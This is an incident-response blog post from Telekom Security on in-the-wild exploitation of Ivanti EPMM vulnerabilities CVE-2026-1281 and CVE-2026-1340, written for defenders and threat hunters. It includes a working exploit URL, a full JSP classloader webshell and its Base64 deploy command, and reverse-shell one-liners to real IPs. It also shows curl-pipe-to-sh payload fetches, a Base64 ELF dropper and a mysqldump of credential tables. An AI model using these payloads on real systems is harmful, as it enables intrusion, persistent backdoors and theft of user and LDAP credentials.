Telekom Security

In early 2026, two critical zero-day vulnerabilities in Ivanti’s mobile device management platform - CVE-2026-1281 and CVE-2026-1340 - emerged as significant drivers of incident activity across multiple sectors. Both flaws, rated CVSS 9.8 (critical), allow unauthenticated remote code execution, enabling attackers to compromise Ivanti Endpoint Manager Mobile (EPMM) appliances and potentially pivot into broader enterprise environments. These vulnerabilities were disclosed by Ivanti on January 29, 2026, alongside emergency mitigation guidance.

The German Federal Office for Information Security (BSI) subsequently issued a warning highlighting widespread exploitation of these issues in the wild and urging operators to assess and respond to potential compromises using updated detection scripts and indicators of compromise.

Last week, our Incident Response team was engaged in multiple incidents involving active exploitation of these vulnerabilities across different customer environments. In several cases, threat actors had already established persistence and initiated post-exploitation activities.

This post consolidates key findings derived from our incident response engagements related to CVE-2026-1281 and CVE-2026-1340. It provides insights into observed attacker tradecraft and initial access patterns. Since the initial vulnerability disclosure, a saturated threat landscape has evolved. Multiple threat actors / botnets have since established persistence, creating a high level of background noise. Therefore we’re avoiding attribution and detailed analysis and instead focus on documentation about our findings.

How the exploit works

Both CVE-2026-1281 and CVE-2026-1340 are critical pre-authentication Remote Command Execution (RCE) vulnerabilities with a CVSS score of 9.8. The vulnerabilities used in ongoing exploitation campaigns are caused by unsafe handling of attacker-controlled input in a server-side Bash script. In plain terms: an internet-exposed EPMM web endpoint forwards parts of an incoming request into a script, and due to a shell-evaluation bug, that input can be interpreted as code — so the device ends up running commands the attacker chooses.

The vulnerable bash scripts are /mi/bin/map-appstore-url and /mi/bin/map-aft-store-url. Both are called when specific HTTP endpoints are requested. As Watchtowr described in a blog post, a vulnerable HTTP endpoint corresponds to the pattern: /mifs/c/appstore/fob/3/<int>/sha256:<something1>/<something2>.ipa. For example, a working exploit request looks like this:

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue  ,
et=1337133713,h=gPath[`sleep 5`]/e2327851-1e09-4463-9b5a-b524bc71fc07.ipa

The parameters st, and h are not chosen arbitrarily, but are crafted specifically for exploitation. The exact mechanism how the exploit works is described in depth by Watchtowr. For now, the key takeaways are:

• The value of the st argument corresponds to an existing variable name in the bash script. Specifically, theValue holds the value of the last argument passed to the bash script. Furthermore, gPath also corresponds to an existing variable in the bash script, though its value does not matter for the exploit to work.
• The key detail of the exploit is that at some point in the vulnerable bash script, the value theValue is evaluated as a bash expression. For the above example, this means that gPath[`sleep 5`] is evaluated, causing bash to execute the inner command sleep 5 in an attempt to calculate an array index that can be used to access gPath. Since the inner command is provided by the attacker, this results in arbitrary command execution.

None of the above steps require authentication. This means that the vulnerability can be exploited by anyone who is able to connect to vulnerable appliances, for example via the internet. Moreover, following release of example exploit requests, threat actors rapidly adopted the exploit in various malicious activities.

What we observed

During our investigation across multiple Ivanti EPMM environments, we identified consistent exploitation attempts targeting CVE-2026-1281 and CVE-2026-1340. The observed activity aligns with publicly reported in-the-wild exploitation and demonstrates behavior ranging from opportunistic scanning and remote code execution (RCE) validation to advanced post-exploitation actions.

1. Initial Exploitation and RCE Validation

We observed HTTP requests targeting known vulnerable endpoints associated with the Apache RewriteMap bash injection flaw. Payloads were embedded directly within GET parameters, consistent with command injection exploitation patterns.

The injected commands were primarily designed to validate successful remote code execution. Commonly observed commands included:

• id
• whoami
• hostname
• passwd
• wget
• ps
• echo-based output redirection
• sleep and true for timing and execution control
• rm commands for cleanup of temporary artifacts

In several cases, command output was redirected into web-accessible paths under the Tomcat webroot, including:

• /mi/.../webapps/mifs/403.jsp
• /mi/.../webapps/mifs/401.jsp
• /mi/.../webapps/mifs/css/*.css

The redirection of command output into web-accessible directories indicates that command execution was successful rather than limited to reconnaissance scanning.

DNS-based validation activity was also observed. Repeated execution of dig commands targeting attacker-controlled domains suggests OAST-style callback validation of command execution. These DNS lookups were often executed multiple times in short intervals.

2. Webshell Deployment Activity

Multiple indicators were identified that are consistent with JSP webshell deployment in Tomcat web application directories.

A recurring marker string was identified:

class U extends ClassLoader

This string is commonly associated with an in-memory Java class loader webshell. Observed behavior indicates that attackers first checked for the presence of this string within 403.jsp. If absent, Base64-decoded content was appended to the file.

Associated commands included:

• grep -q "class U extends ClassLoader" /mi/tomcat/webapps/mifs/403.jsp
• base64 -d >> /mi/tomcat/webapps/mifs/403.jsp
• id > /mi/tomcat/webapps/mifs/403.jsp
• xxd -r -p .1 > /mi/tomcat/webapps/mifs/401.jsp

The use of xxd suggests hex-encoded payload staging followed by reconstruction into a JSP file. This indicates deliberate effort to obfuscate payload delivery.

We also observed permission-related commands such as:

• chmod +s /usr/bin/env

Indicators point to 403.jsp being used as a webshell location:

• Attempted permission manipulation / privilege-related command:
  • chmod +s /bin/sh > /mi/tomcat/webapps/mifs/403.jsp
• Additionally, we observed an explicit attacker “webshell check + deploy” logic
  • Webshell check / conditional append:

if grep -q "class U extends ClassLoader" "/mi/tomcat/webapps/mifs/403.jsp"; 
then echo 1; else echo -n 
PCUhIGNsYXNzIFUgZXh0ZW5kcyBDbGFzc0xvYWRlciB7IFUoQ2xhc3NMb2FkZXIgYykgeyBzdXBlcihjKTsgfSBwdWJsaWM
gQ2xhc3MgZyhieXRlW10gYikgeyByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoYiwgMCwgYi5sZW5ndGgpOyB9fSBwdWJsaW
MgYnl0ZVtdIHAoU3RyaW5nIG8pIHRocm93cyBFeGNlcHRpb24geyB0cnkgeyBDbGFzcyBqID0gQ2xhc3MuZm9yTmFtZSgic
3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOyByZXR1cm4gKGJ5dGVbXSkgai5nZXRNZXRob2QoImRlY29kZUJ1ZmZlciIsIFN0
cmluZy5jbGFzcykuaW52b2tlKGoubmV3SW5zdGFuY2UoKSwgbyk7IH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7IENsYXNzIGo
gPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7IE9iamVjdCB0ID0gai5nZXRNZXRob2QoImdldERlY29kZX
IiKS5pbnZva2UobnVsbCk7IHJldHVybiAoYnl0ZVtdKSB0LmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBTdHJpb
mcuY2xhc3MpLmludm9rZSh0LCBvKTsgfX0gJT48JSAgU3RyaW5nIGwgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiayIpOyBp
ZiAobCAhPSBudWxsKSB7IG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKHAobCkpLm5ld0luc3R
hbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KTsgfSAlPgo= | base64 -d >> /mi/tomcat/webapps/mifs/403.jsp ; 
chmod +s /usr/bin/env; fi`]/f099583e-9702-4812-b5b5-221d3f3ce33e.ipa

This logic indicates:

• The attacker checks whether a specific Java in-memory loader pattern is already present (class U extends ClassLoader)
• If not present, the attacker appends Base64-decoded content into 403.jsp
• The attacker then attempts to change permissions (chmod +s /usr/bin/env) as a potential privilege-related action

Webshell 403.jsp:

< % !class U extends ClassLoader {
    U(ClassLoader c) {
        super(c);
    }
    public Class g(byte[] b) {
        return super.defineClass(b, 0, b.length);
    }
}
public byte[] p(String o) throws Exception {
    try {
        Class j = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) j.getMethod("decodeBuffer", String.class).invoke(j.newInstance(), o);
    } catch (Exception e) {
        Class j = Class.forName("java.util.Base64");
        Object t = j.getMethod("getDecoder").invoke(null);
        return (byte[]) t.getClass().getMethod("decode", String.class).invoke(t, o);
    }
} % > < % String l = request.getParameter("k");
if (l != null) {
    new U(this.getClass().getClassLoader()).g(p(l)).newInstance().equals(pageContext);
} % >

The observed backdoors correspond to the 403.jsp described by Defused and 401.jsp described by Palo Alto.

3. Reverse Shell and Interactive Access Attempts

Multiple reverse shell payloads were delivered through command injection. Observed techniques included:

• bash -i >& /dev/tcp/<ip>/443 0>&1
• /bin/sh -i >& /dev/tcp/<ip>/443 0>&1
• Python-based reverse shell using socket connections

  export RHOST="86.106.143[.]200";export RPORT=443;python3 -c "import sys,socket,os,pty;
  s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));
  [os.dup2(s.fileno(),fd) for fd in (0,1,2)]"
  

• nc and ncat interactive shell attempts

4. Payload Retrieval and Tool Deployment

We identified chained command execution used to download and execute remote scripts, including:

• curl -fsSL http://45.76.28[.]252:8083/update.sh | sh
• wget http://45.76.28[.]252:8083/update.sh -O - | sh

Additionally, we observed telnet-over-curl execution patterns:

• curl -Ns telnet://217.148.142[.]48:443 | sh

These command chains are indicative of second-stage payload deployment and remote command execution frameworks.

In one instance, Logs show an echo command used to write/drop the Base64-decoded ELF binary malware payload with hash: 2e29ad27b64874bfcb0c926fa324465243844ca8d36ab2db9ab79cf4d787b513

echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAA
AAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAA
A+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIh
cB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgABu9mUjjBRSInmahBaaipYDwV
ZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FS
IXAeO3/5g== | base64 --decode > sysd && chmod +x sysd && ./sysd

That echo write event was observed across the message log, HTTP request log and access log. Short analysis of this compact malware shows file read/write + dropped files and outbound contact to 217.148.142[.]48, aligning with post-dropper / C2-style behavior.

5. Database Access and Data Collection Attempts

Explicit database export commands targeting Ivanti-related tables were identified:

mysqldump --databases mifs --tables mi_user mifs_ldap_users mifs_ldap_server_config mi_device 
mi_app_setting_entry eas_proxy mi_password_history > /var/www/ext/html/tmp

The targeted tables include user accounts, LDAP configurations, device information, application settings, proxy configuration, and password history. This suggests potential credential harvesting or configuration exfiltration objectives.

Archiving activity was also identified:

tar -czvf /var/www/ext/html/tmpno /mi/files/system

This behavior is consistent with staging system data for potential exfiltration.

6. Webroot Write Validation and Staging

Multiple write tests targeting static asset directories were identified, including:

• echo ok1 > /mi/.../webapps/mifs/css/app.css
• (id; hostname) > /mi/.../css/bootstrap/1o465S.css
• echo ".float-left" > /mi/.../webapps/mifs/css/login.css

Temporary files were created and subsequently removed:

• touch /tmp/test files
• rm .1
• rm staged CSS files

This pattern indicates validation of write capability followed by cleanup to reduce forensic footprint.

7. Observed Activity Patterns

Across the analyzed environments, we observed recurring activity patterns that align with publicly documented exploitation techniques for CVE-2026-1281 and CVE-2026-1340. The activities can be grouped into the following behavioral categories:

• Remote Code Execution Validation
• Webroot Write Validation
• Webshell deployment attempts (401.jsp / 403.jsp).
• Reverse shell establishment attempts over TCP/443.
• Retrieval and execution of secondary payloads via curl/wget.
• Database export attempts and potential data staging.
• Cleanup commands and anti-forensic behavior.

What others report

Palo Alto: Critical Vulnerabilities in Ivanti EPMM Exploited

Researchers from Palo Alto reported that exploitation of CVE-2026-1281 and CVE-2026-1340 has been observed across various sectors in the United States, Germany, Australia, and Canada, including state and local government, healthcare, manufacturing, professional and legal services, and high technology. Threat actors are rapidly moving from initial reconnaissance to deploying dormant backdoors to maintain long-term access even after organizations apply patches, indicating a sophisticated and persistent threat.

Specifically, Palo Alto Unit 42 has observed widespread and mostly automated exploitation attempts, including establishing reverse shells, installing web shells, conducting reconnaissance, and downloading malware. Attackers have been observed downloading a Nezha monitoring agent, an open-source server monitoring utility, with specific parameters to fetch from Gitee if the victim’s location is China. Reconnaissance attempts involve injecting “sleep” commands to determine server vulnerability, with a 5-second delay indicating successful RCE. Threat actors attempt to install lightweight JSP web shells (e.g., 401.jsp, 403.jsp, 1.jsp), which can grant administrative control if the web server runs as root.

Observed exploitation attempts include downloading a second-stage payload (the /slt script) to install web shells, cryptominers, or persistent backdoors. Indicators of Compromise (IOCs) include various IP addresses, subdomains (e.g., gobygo[.]net, introo[.]sh, ngrok-free[.]app), and specific file paths for web shells (e.g., /mi/tomcat/webapps/mifs/401.jsp).

Defused: Sleeper Shells: How Attackers Are Planting Dormant Backdoors in Ivanti EPMM

A blog post published by Defused also mentioned the deployment of web shell under the path /mifs/403.jsp. In this case, the payload contained Base64-encoded Java bytecode and worked as an in-memory class loader. To trigger the backdoor function, a specific HTTP header k0f53cf964d387 needs to be passed with the request, which will lead to the decoding and in-memory execution of the malicious payload.

Watchtowr: Someone Knows Bash Far Too Well, And We Love It (Ivanti EPMM Pre-Auth RCEs CVE-2026-1281 & CVE-2026-1340)

Watchtowr published a technical deep-dive into the two vulnerabilities, which stem from improper handling of attacker-controlled input within Bash scripts used by Ivanti EPMM, specifically through arithmetic expansion in the map-appstore-url script. The temporary RPM patches modify Apache HTTPd configurations to replace vulnerable Bash scripts with newly compiled Java classes, specifically AFTUrlMapper.java and AppStoreUrlMapper.java.

The vulnerable Bash scripts, map-appstore-url and map-aft-store-url, were previously invoked by Apache RewriteMap instances. The map-appstore-url script processes parameters from the URL path, including kid, st, et, and h, which are then used in Bash arithmetic expansions. The specific exploitation vector involves injecting a command substitution into the h parameter, which is subsequently referenced by gStartTime during an arithmetic expansion, leading to command execution. The st parameter in the exploit payload requires two padding spaces to bypass a string length validation check.

Ivanti EPMM: Aktive Angriffe über Zero-Day Schwachstellen beobachtet

The German Federal Office for Information Security (BSI) also warned about the two vulnerabilities and noted that active exploitation of the CVEs could have occured since at least summer 2025, with further exploitation by other cyber actors noted shortly after public disclosure on January 29, 2026. BSI also remarked that successful exploitation of these vulnerabilities can lead to the exfiltration of sensitive information, including personal data, device and location data, credentials, and cryptographic keys, as well as potential lateral movement within the connected network.

BSI has confirmed that German organizations have been targeted by attackers exploiting these vulnerabilities, with the Shadowserver Foundation detecting over 20 compromised organizations in Germany alone. Compromised Ivanti EPMM appliances, including those that have reached End-of-Life (EoL), are likely to have been exploited, and operators should assume compromise even if they patched on the day of disclosure.

Attackers have been observed deploying malicious files, such as webshells, in the root, /tmp, and /var/tmp directories, often with one or two-digit filenames and compressed with 7z/LZMA2 algorithms. A persistent webshell was established by attackers using the file favicon.png located at /var/www/ext/html/favicon.png. Observed post-exploitation activities include the use of specific IP addresses (e.g., 161.129.60[.]118, 151.177.78[.]0, 185.212.171[.]137, 185.212.171[.]151, 185.212.171[.]134, 185.212.171[.]156) and a faulty User-Agent Edg/143.0.0.1.

BSI recommends that organizations monitor their entire network for suspicious data traffic or login attempts, not just systems directly connected to Ivanti EPMM, due to potential data exfiltration and lateral movement. BSI has rated the criticality of these vulnerabilities as 3/Orange, indicating that immediate action is required due to the potential for massive disruption to regular operations.

Recommendations

Organizations operating affected Ivanti EPMM instances should immediately apply the latest vendor patches if this has not already been done. Given confirmed in-the-wild exploitation and the likelihood of pre-patch compromise, organizations that updated their systems only after public disclosure should strongly consider conducting a structured compromise assessment.

Guidance and technical indicators published by the German Federal Office for Information Security (BSI), as well as the detection script jointly provided by NCSC-NL and Ivanti, offer a valuable foundation for identifying potential indicators of compromise and validating system integrity.

For organizations that require additional expertise or independent validation, Telekom Security can support organizations with tailored compromise assessments, threat hunting activities, and incident response services to ensure potential persistence mechanisms or lateral movement activities are identified and contained.

IOCs

IOCs can be found here.